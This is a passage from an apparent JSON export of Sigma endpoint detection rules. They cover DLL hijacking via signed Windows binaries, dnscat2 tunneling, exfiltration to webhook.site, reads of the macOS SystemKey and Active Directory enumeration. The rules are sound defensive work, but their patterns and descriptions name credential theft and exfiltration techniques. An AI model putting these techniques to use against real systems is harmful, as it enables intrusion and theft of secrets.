ProcessParentSignature: 'Matisoft Édition (Martin Baptiste)'\n\n exclusion_procreances:\n ProcessParentImage|endswith: '\\Procreances.exe'\n ProcessParentProduct: 'Procreances'\n ProcessParentDescription: 'Gestion Cabinet Recouvrement'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "74422f0a-4d43-4762-b069-3d5862f1ae35",
"rule_name": "Dialer.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate Windows binary dialer.exe, spawned without arguments. This can mean that the binary is being used as sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used by Rhadamanthys, a malicious information stealer which is being distributed mostly via malicious Google advertisements.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the dialer.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-03-27",
"rule_modified_date": "2025-10-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "747036bf-6ed1-402f-8ff0-a86d4a7caacb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600480Z",
"creation_date": "2026-03-23T11:45:34.600484Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600491Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dsregcmd.yml",
"content": "title: DLL Hijacking via dsregcmd.exe\nid: 747036bf-6ed1-402f-8ff0-a86d4a7caacb\ndescription: |\n Detects potential Windows DLL Hijacking via dsregcmd.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsregcmd.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dsreg.dll'\n - '\\logoncli.dll'\n - '\\ncrypt.dll'\n - '\\netutils.dll'\n - '\\PROPSYS.dll'\n - '\\secur32.dll'\n - '\\SSPICLI.DLL'\n - '\\USERENV.dll'\n - '\\WINHTTP.dll'\n - '\\WININET.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "747036bf-6ed1-402f-8ff0-a86d4a7caacb",
"rule_name": "DLL Hijacking via dsregcmd.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dsregcmd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "74c8a0a8-cc75-430e-be46-60cb5efaebc0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603013Z",
"creation_date": "2026-03-23T11:45:34.603016Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603024Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/",
"https://github.com/iagox86/dnscat2",
"https://attack.mitre.org/techniques/T1572/"
],
"name": "t1572_dnscat_tunneling_request.yml",
"content": "title: DNS Name Associated with dnscat2 Resolved\nid: 74c8a0a8-cc75-430e-be46-60cb5efaebc0\ndescription: |\n Detects a DNS query starting with \"dnscat.\", which is associated with default dnscat2 binaries.\n Dnscat2 is a DNS tunneling tool. Adversaries may use the DNS protocol to communicate with their C&C as a way to circumvent network protections.\n It is recommended to check the content of the request and to look for suspicious behavior by the process making the request.\nreferences:\n - https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/\n - https://github.com/iagox86/dnscat2\n - https://attack.mitre.org/techniques/T1572/\ndate: 2025/09/24\nmodified: 2025/09/30\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1572\n - attack.t1071.004\n - attack.t1568.003\n - attack.exfiltration\n - attack.t1048.003\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n Image|contains: '?'\n QueryName|startswith: 'dnscat.'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "74c8a0a8-cc75-430e-be46-60cb5efaebc0",
"rule_name": "DNS Name Associated with dnscat2 Resolved",
"rule_description": "Detects a DNS query starting with \"dnscat.\", which is associated with default dnscat2 binaries.\nDnscat2 is a DNS tunneling tool. Adversaries may use the DNS protocol to communicate with their C&C as a way to circumvent network protections.\nIt is recommended to check the content of the request and to look for suspicious behavior by the process making the request.\n",
"rule_creation_date": "2025-09-24",
"rule_modified_date": "2025-09-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.003",
"attack.t1071.004",
"attack.t1568.003",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "74ca3e8c-023b-412c-b594-c231e695e097",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077320Z",
"creation_date": "2026-03-23T11:45:34.077323Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077330Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/@simone.kraus/critical-engergy-infrastructure-facility-in-ukraine-attack-b15638f6a402",
"https://www.zscaler.com/blogs/security-research/steal-it-campaign",
"https://attack.mitre.org/techniques/T1567/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1567_url_request_webhook.yml",
"content": "title: URL Request to Webhook Service\nid: 74ca3e8c-023b-412c-b594-c231e695e097\ndescription: |\n Detects URL requests to a webhook service such as Webhook.site.\n These services allow for automatic logging of the requests they receive and can be configured to reply custom responses.\n Attackers use such services to exfiltrate stolen data stealthfully, or to host and deliver malicious payloads.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://medium.com/@simone.kraus/critical-engergy-infrastructure-facility-in-ukraine-attack-b15638f6a402\n - https://www.zscaler.com/blogs/security-research/steal-it-campaign\n - https://attack.mitre.org/techniques/T1567/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2023/09/07\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1567\n - attack.command_and_control\n - attack.t1105\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n RequestUrlHost: 'webhook.site'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "74ca3e8c-023b-412c-b594-c231e695e097",
"rule_name": "URL Request to Webhook Service",
"rule_description": "Detects URL requests to a webhook service such as Webhook.site.\nThese services allow for automatic logging of the requests they receive and can be configured to reply custom responses.\nAttackers use such services to exfiltrate stolen data stealthfully, or to host and deliver malicious payloads.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
"rule_creation_date": "2023-09-07",
"rule_modified_date": "2025-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1567"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "74d81cc1-fab9-4018-9433-2fedef3fe99a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617581Z",
"creation_date": "2026-03-23T11:45:34.617583Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617587Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1552/003/"
],
"name": "t1564_001_read_systemkey.yml",
"content": "title: Suspicious Access to SystemKey\nid: 74d81cc1-fab9-4018-9433-2fedef3fe99a\ndescription: |\n Detects a suspicious access to the SystemKey file.\n Adversaries may read the SystemKey in order to unlock the system Keychain file.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1552/003/\ndate: 2024/07/22\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.003\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_path:\n Path: '/private/var/db/SystemKey'\n Kind: 'read'\n ProcessImage|contains: '/'\n\n filter_sedcurityd:\n ProcessImage: '/usr/sbin/securityd'\n\n exclusion_birdagent:\n ProcessImage|endswith: '/bird_agent_stable'\n ProcessSigned: 'true'\n ProcessSignatureSigningId: '_bird_python_dbg'\n\n exclusion_broadcom:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.broadcom.mes.systemextension'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bitdefender.bddaemon'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "74d81cc1-fab9-4018-9433-2fedef3fe99a",
"rule_name": "Suspicious Access to SystemKey",
"rule_description": "Detects a suspicious access to the SystemKey file.\nAdversaries may read the SystemKey in order to unlock the system Keychain file.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2025-03-07",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "74d9e50a-fabb-42bb-90dc-e3077f67a6da",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604776Z",
"creation_date": "2026-03-23T11:45:34.604780Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604787Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_powershell_get_adcomputer.yml",
"content": "title: Get-ADComputer PowerShell Cmdlet Results Exported\nid: 74d9e50a-fabb-42bb-90dc-e3077f67a6da\ndescription: |\n Detects the usage of Get-ADComputer PowerShell cmdlet whose results are exported to a file.\n The Get-ADComputer cmdlet allows to enumerate Domain computers' properties.\n This is a classic discovery technique used by attackers to get an overview of assets enrolled in the Active Directory.\n It is recommended to analyze the process responsible for the execution of the cmdlet to look for malicious content as well as to correlate this alert with other potential discovery activities on the host.\nreferences:\n - https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2024/02/22\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - attack.t1018\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Get-ADComputer -Filter \\* -Properties \\* | Export-CSV '\n - 'Get-ADComputer -Filter \\* -Properties \\* | Out-File'\n - 'Set-Content -Path * -Value (Get-ADComputer -Filter \\* -Properties \\*)'\n - 'Add-Content -Path * -Value (Get-ADComputer -Filter \\* -Properties \\*)'\n\n exclusion_listing:\n PowershellCommand|contains:\n - '\\Install\\scripts\\list_Computer.ps1'\n - '\\SCRIPT\\List_Computer.ps1'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "74d9e50a-fabb-42bb-90dc-e3077f67a6da",
"rule_name": "Get-ADComputer PowerShell Cmdlet Results Exported",
"rule_description": "Detects the usage of Get-ADComputer PowerShell cmdlet whose results are exported to a file.\nThe Get-ADComputer cmdlet allows to enumerate Domain computers' properties.\nThis is a classic discovery technique used by attackers to get an overview of assets enrolled in the Active Directory.\nIt is recommended to analyze the process responsible for the execution of the cmdlet to look for malicious content as well as to correlate this alert with other potential discovery activities on the host.\n",
"rule_creation_date": "2024-02-22",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1033"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "74e8fff3-ecca-4f51-a9e7-46d86eca135d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593422Z",
"creation_date": "2026-03-23T11:45:34.593425Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593433Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sgrmlpac.yml",
"content": "title: DLL Hijacking via SgrmLpac.exe\nid: 74e8fff3-ecca-4f51-a9e7-46d86eca135d\ndescription: |\n Detects potential Windows DLL Hijacking via SgrmLpac.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SgrmLpac.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\winhttp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "74e8fff3-ecca-4f51-a9e7-46d86eca135d",
"rule_name": "DLL Hijacking via SgrmLpac.exe",
"rule_description": "Detects potential Windows DLL Hijacking via SgrmLpac.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "75594437-cac0-4935-a8ee-5bf04bc63744",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089855Z",
"creation_date": "2026-03-23T11:45:34.089858Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089865Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_pcaui.yml",
"content": "title: DLL Hijacking via pca.exe\nid: 75594437-cac0-4935-a8ee-5bf04bc63744\ndescription: |\n Detects potential Windows DLL Hijacking via pca.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pcaui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\pcaui.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "75594437-cac0-4935-a8ee-5bf04bc63744",
"rule_name": "DLL Hijacking via pca.exe",
"rule_description": "Detects potential Windows DLL Hijacking via pca.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "75ebf1b7-01fe-4fa5-99d6-3329b1c4c8d9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097291Z",
"creation_date": "2026-03-23T11:45:34.097293Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097297Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wscollect.yml",
"content": "title: DLL Hijacking via WSCollect.exe\nid: 75ebf1b7-01fe-4fa5-99d6-3329b1c4c8d9\ndescription: |\n Detects potential Windows DLL Hijacking via WSCollect.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WSCollect.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "75ebf1b7-01fe-4fa5-99d6-3329b1c4c8d9",
"rule_name": "DLL Hijacking via WSCollect.exe",
